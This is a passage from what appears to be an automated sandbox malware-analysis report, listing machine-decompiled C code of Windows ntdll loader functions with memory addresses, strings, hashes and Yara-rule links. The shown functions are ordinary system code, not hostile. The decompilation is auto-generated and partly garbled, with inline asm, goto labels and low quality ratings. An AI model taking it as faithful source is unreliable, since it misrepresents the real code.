                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: b6a58f3d18a348b75be60ff345d2014638c3ac57070d5ef021fa46268f68e158
                                                    • Instruction ID: 3652308b59f2d691bdb6c87c4a6db20c7ffd8f289e56612ab4d9290a929c06ea
                                                    • Opcode Fuzzy Hash: b6a58f3d18a348b75be60ff345d2014638c3ac57070d5ef021fa46268f68e158
                                                    • Instruction Fuzzy Hash: E4F12E72D04619EFDF15DF98C940AEEB7F9FF48654F1400AAE905A7620E734AE41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B78E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E04B78E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4c3d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4c38464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4c35780 & 0x00000003) != 0) {
							E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4c35780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04B8B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4c37984; // 0xc93e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4c38464; // 0x74790110
					 *0x4c3b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04B79B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4c35780 & 0x00000005) != 0) {
						_push(_t49);
						E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                    0x04b78e0f
                                                    0x04b78e16
                                                    0x04b78e19
                                                    0x04b78e1b
                                                    0x04b78e21
                                                    0x04b78e7f
                                                    0x04b78e85
                                                    0x04bb9354
                                                    0x04bb936c
                                                    0x04bb9371
                                                    0x04bb937b
                                                    0x04bb9381
                                                    0x04bb9381
                                                    0x04bb937b
                                                    0x04b78e9d
                                                    0x04b78e9d
                                                    0x04b78e29
                                                    0x04b78e2c
                                                    0x04b78e38
                                                    0x04b78e3e
                                                    0x04b78e43
                                                    0x04b78eb5
                                                    0x04b78eb9
                                                    0x04bb92aa
                                                    0x04bb92af
                                                    0x04bb92e8
                                                    0x04bb92e8
                                                    0x04bb92af
                                                    0x04b78eb9
                                                    0x04b78e45
                                                    0x04b78e53
                                                    0x04b78e5b
                                                    0x04b78e5f
                                                    0x04b78e78
                                                    0x04b78e78
                                                    0x04b78e7d
                                                    0x04b78ec3
                                                    0x04b78ecd
                                                    0x04b78ed2
                                                    0x04b78ed2
                                                    0x04b78ec5
                                                    0x04b78ec5
                                                    0x00000000
                                                    0x04b78e7d
                                                    0x04b78e67
                                                    0x04b78ea4
                                                    0x04bb931a
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb9320
                                                    0x04b78ea4
                                                    0x04b78e70
                                                    0x04bb9325
                                                    0x04bb9340
                                                    0x04bb9345
                                                    0x04bb9345
                                                    0x04b78e76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    • LdrpFindDllActivationContext, xrefs: 04BB9331, 04BB935D
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 04BB9357
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04BB932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 04BB933B, 04BB9367
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 6c60a450d0632c78666fc04d72110d672ec40a182ba865a817c6b8a01db8030d
                                                    • Instruction ID: ffcc5bfc87fd6e73bc62511f5ed6449a1fc132d2c419b25dd67419413dfa1c8f
                                                    • Opcode Fuzzy Hash: 6c60a450d0632c78666fc04d72110d672ec40a182ba865a817c6b8a01db8030d
                                                    • Instruction Fuzzy Hash: 7041E732B00315AFDB35BE18C88DB76B2B5EB05354F0549E9E96D97160E774BD8086C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B58794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E04B58794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04B5934A() != 0) {
								_t159 = E04BCA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4c35780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04BC5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4c35780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04B5849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04B58999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04B58999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4c35c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4c35c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04B62280(_t92, 0x4c386cc);
															_t94 = E04C19DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04B761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4c35c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04B58A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4c35c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4c35c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04B8F380(_t136, 0x4b21184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04B62280(_t108, 0x4c386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04B761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04C19D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04B5FFB0(_t118, _t156, 0x4c386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04B89A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                    0x04b58799
                                                    0x04b5879d
                                                    0x04b587a1
                                                    0x04b587a3
                                                    0x04b587a8
                                                    0x04b587c3
                                                    0x04b587c3
                                                    0x04b587c8
                                                    0x04b587d1
                                                    0x04b587d4
                                                    0x04b587d8
                                                    0x04b587e5
                                                    0x04b587ec
                                                    0x04ba9bfe
                                                    0x04ba9c00
                                                    0x04ba9c02
                                                    0x04ba9c08
                                                    0x04ba9c0d
                                                    0x04ba9c0f
                                                    0x04ba9c14
                                                    0x04ba9c2d
                                                    0x04ba9c32
                                                    0x04ba9c37
                                                    0x04ba9c3a
                                                    0x04ba9c3c
                                                    0x04ba9c42
                                                    0x04ba9c42
                                                    0x04ba9c3c
                                                    0x04ba9c02
                                                    0x04b587da
                                                    0x04b587df
                                                    0x04b587e3
                                                    0x00000000
                                                    0x00000000
                                                    0x04b587e3
                                                    0x04b587f2
                                                    0x00000000
                                                    0x04b587fb
                                                    0x04b587fd
                                                    0x04b587fe
                                                    0x04b5880e
                                                    0x04b5880f
                                                    0x04b58810
                                                    0x04b58814
                                                    0x04b5881a
                                                    0x04b5881c
                                                    0x04b5881f
                                                    0x04b58821
                                                    0x04b58822
                                                    0x04b58824
                                                    0x04b58826
                                                    0x04b5882c
                                                    0x04b5882e
                                                    0x04ba9c48
                                                    0x04ba9c48
                                                    0x04b58834
                                                    0x04b58834
                                                    0x04b58837
                                                    0x00000000
                                                    0x00000000
                                                    0x04b58837
                                                    0x04b5882e
                                                    0x04b5883d
                                                    0x04b58840
                                                    0x04b58843
                                                    0x04b58846
                                                    0x04b58849
                                                    0x04b5884c
                                                    0x04b5884e
                                                    0x04b58850
                                                    0x04b58852
                                                    0x04b58854
                                                    0x04b58857
                                                    0x04b588b4
                                                    0x04b588b6
                                                    0x04b588b6
                                                    0x04b58859
                                                    0x04b58859
                                                    0x04b58859
                                                    0x04b58861
                                                    0x04b58866
                                                    0x04b5886a
                                                    0x04b5893d
                                                    0x04b58941
                                                    0x00000000
                                                    0x04b58947
                                                    0x04b58947
                                                    0x04b5894a
                                                    0x04b5894c
                                                    0x00000000
                                                    0x04b58952
                                                    0x04b58955
                                                    0x04b5895a
                                                    0x04b5895d
                                                    0x04b5895d
                                                    0x04b5895f
                                                    0x04b58961
                                                    0x04b58961
                                                    0x04b58968
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5896a
                                                    0x04b5896b
                                                    0x04b5896e
                                                    0x00000000
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58970
                                                    0x04b58972
                                                    0x04b58972
                                                    0x04b58974
                                                    0x00000000
                                                    0x04b5897a
                                                    0x04b5897a
                                                    0x04b5897d
                                                    0x00000000
                                                    0x04b58983
                                                    0x04ba9c65
                                                    0x04ba9c6d
                                                    0x04ba9c72
                                                    0x04ba9c75
                                                    0x04ba9c75
                                                    0x04ba9c82
                                                    0x04ba9c86
                                                    0x04ba9c87
                                                    0x04ba9c88
                                                    0x04ba9c89
                                                    0x04ba9c8c
                                                    0x04ba9c90
                                                    0x04ba9c95
                                                    0x04ba9c97
                                                    0x04ba9ca0
                                                    0x04ba9ca3
                                                    0x04ba9ca9
                                                    0x04ba9ca9
                                                    0x00000000
                                                    0x04ba9ca9
                                                    0x04ba9ca3
                                                    0x00000000
                                                    0x04ba9c97
                                                    0x04b5897d
                                                    0x00000000
                                                    0x04b58974
                                                    0x04b58988
                                                    0x04b58992
                                                    0x04b58996
                                                    0x00000000
                                                    0x04b58996
                                                    0x04b5894c
                                                    0x00000000
                                                    0x04b58870
                                                    0x04b5887b
                                                    0x04b5887d
                                                    0x04b5887f
                                                    0x04b58881
                                                    0x04b58884
                                                    0x04b58884
                                                    0x04b58886
                                                    0x04b58889
                                                    0x04b5888c
                                                    0x04b5888e
                                                    0x04b58891
                                                    0x04b58891
                                                    0x04b58898
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5889a
                                                    0x04b5889b
                                                    0x04b5889e
                                                    0x00000000
                                                    0x00000000
                                                    0x04b588a0
                                                    0x04b588a8
                                                    0x04b588b0
                                                    0x04b588b2
                                                    0x04b588d3
                                                    0x04b588d5
                                                    0x00000000
                                                    0x04b588d7
                                                    0x04b588db
                                                    0x04b588dc
                                                    0x04b588e0
                                                    0x04b588e8
                                                    0x04b588ee
                                                    0x04b588f0
                                                    0x04b588f3
                                                    0x04b588fc
                                                    0x04b58901
                                                    0x04b58906
                                                    0x04b5890c
                                                    0x04b5890c
                                                    0x04b5890f
                                                    0x04b58916
                                                    0x04b58917
                                                    0x04b58918
                                                    0x04b58919
                                                    0x04b5891a
                                                    0x04b5891f
                                                    0x04b58921
                                                    0x04ba9c52
                                                    0x04ba9c55
                                                    0x04ba9c5b
                                                    0x04ba9cac
                                                    0x04ba9cc0
                                                    0x04ba9cc0
                                                    0x04ba9c55
                                                    0x04b58927
                                                    0x04b58927
                                                    0x04b5892f
                                                    0x04b58933
                                                    0x00000000
                                                    0x04b588f5
                                                    0x04b588f5
                                                    0x00000000
                                                    0x04b588f7
                                                    0x04b588f7
                                                    0x04b588fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b588fa
                                                    0x04b588f5
                                                    0x04b588f3
                                                    0x00000000
                                                    0x04b588d5
                                                    0x00000000
                                                    0x04b588b2
                                                    0x04b588c9
                                                    0x00000000
                                                    0x04b588c9
                                                    0x04b5887f
                                                    0x04b5886a
                                                    0x04b58857
                                                    0x04b58852
                                                    0x04b588bf
                                                    0x04b588bf
                                                    0x04b587aa
                                                    0x04b587ad
                                                    0x04b587ae
                                                    0x04b587b4
                                                    0x04b587b5
                                                    0x04b587b6
                                                    0x04b587b8
                                                    0x04b587bd
                                                    0x04b587c1
                                                    0x04b587f4
                                                    0x04b587fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b587c1
                                                    0x00000000

                                                    Strings
                                                    • LdrpDoPostSnapWork, xrefs: 04BA9C1E
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04BA9C18
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 04BA9C28
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-1948996284
                                                    • Opcode ID: a5927e6a5c1f532ca19049b8190d0cb4dd3c8853c0b94df57d0f2f11260a4829
                                                    • Instruction ID: 0c0ba3e81fd2bd00979b066c4bb3860b8d8d16f641782230eba99c2de836b672
                                                    • Opcode Fuzzy Hash: a5927e6a5c1f532ca19049b8190d0cb4dd3c8853c0b94df57d0f2f11260a4829
                                                    • Instruction Fuzzy Hash: 4591C071A00616ABEF18EF59C481BBAB3B5FF44355B1445E9ED05AB260E730FD21CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B57E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E04B57E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04B5CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04B4C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4c35780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04BC5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4c35780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04B67D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04B67D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04BC7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04B67D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04B67D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04BC7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04B7A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04B4B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                    0x04b57e4c
                                                    0x04b57e50
                                                    0x04b57e55
                                                    0x04b57e58
                                                    0x04b57e5d
                                                    0x04b57e71
                                                    0x04b57f33
                                                    0x04b57e77
                                                    0x04b57e77
                                                    0x04b57e79
                                                    0x04b57e79
                                                    0x04b57e7e
                                                    0x04b57f45
                                                    0x04ba9848
                                                    0x00000000
                                                    0x04ba9848
                                                    0x04b57f4e
                                                    0x04b57f53
                                                    0x04b57f5a
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba985a
                                                    0x04ba9862
                                                    0x04ba9866
                                                    0x00000000
                                                    0x04ba986c
                                                    0x00000000
                                                    0x04ba986c
                                                    0x04b57e84
                                                    0x04b57e84
                                                    0x04b57e8d
                                                    0x04ba9871
                                                    0x04b57eb8
                                                    0x04b57ec0
                                                    0x04b57ec0
                                                    0x04b57e9a
                                                    0x04ba987e
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba9884
                                                    0x04ba988b
                                                    0x04ba98a7
                                                    0x04ba98ac
                                                    0x04ba98b1
                                                    0x04ba98b6
                                                    0x04ba98b8
                                                    0x04ba98b8
                                                    0x04ba98b9
                                                    0x00000000
                                                    0x04ba98b9
                                                    0x04b57ea0
                                                    0x04b57ea7
                                                    0x00000000
                                                    0x00000000
                                                    0x04b57eac
                                                    0x04b57eb1
                                                    0x04b57ec6
                                                    0x04b57ed0
                                                    0x04ba98cc
                                                    0x04b57ed6
                                                    0x04b57ed6
                                                    0x04b57ed6
                                                    0x04b57ede
                                                    0x04b57ee3
                                                    0x04ba98e3
                                                    0x04ba98f0
                                                    0x04ba9902
                                                    0x04ba98f2
                                                    0x04ba98fb
                                                    0x04ba98fb
                                                    0x04ba9907
                                                    0x04ba991d
                                                    0x04ba991d
                                                    0x04ba9907
                                                    0x04ba98e3
                                                    0x04b57ef0
                                                    0x04b57f14
                                                    0x04b57f14
                                                    0x04b57f1e
                                                    0x04ba9946
                                                    0x04b57f24
                                                    0x04b57f24
                                                    0x04b57f24
                                                    0x04b57f2c
                                                    0x04ba996a
                                                    0x04ba9975
                                                    0x04ba9975
                                                    0x04ba997e
                                                    0x04ba9993
                                                    0x04ba9993
                                                    0x04ba997e
                                                    0x00000000
                                                    0x04b57ef2
                                                    0x04b57efc
                                                    0x04b57f0a
                                                    0x04b57f0e
                                                    0x04ba9933
                                                    0x00000000
                                                    0x04ba9933
                                                    0x00000000
                                                    0x04b57f0e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b57eb1

                                                    Strings
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 04BA98A2
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 04BA9891
                                                    • LdrpCompleteMapModule, xrefs: 04BA9898
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 5fd141a31f38451deeaf6d71274b9e77009f29075a4f79dae815245bad2aa294
                                                    • Instruction ID: 1fe62f07b4c02ff86600e83103d74f5bb9d88f21bb4e48dc9cd533e4a8663fb3
                                                    • Opcode Fuzzy Hash: 5fd141a31f38451deeaf6d71274b9e77009f29075a4f79dae815245bad2aa294
                                                    • Instruction Fuzzy Hash: F451EE71704741ABEB21CB68C984B2AFBA8EB04758F0409D9ED559B6E1EB34FD00DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
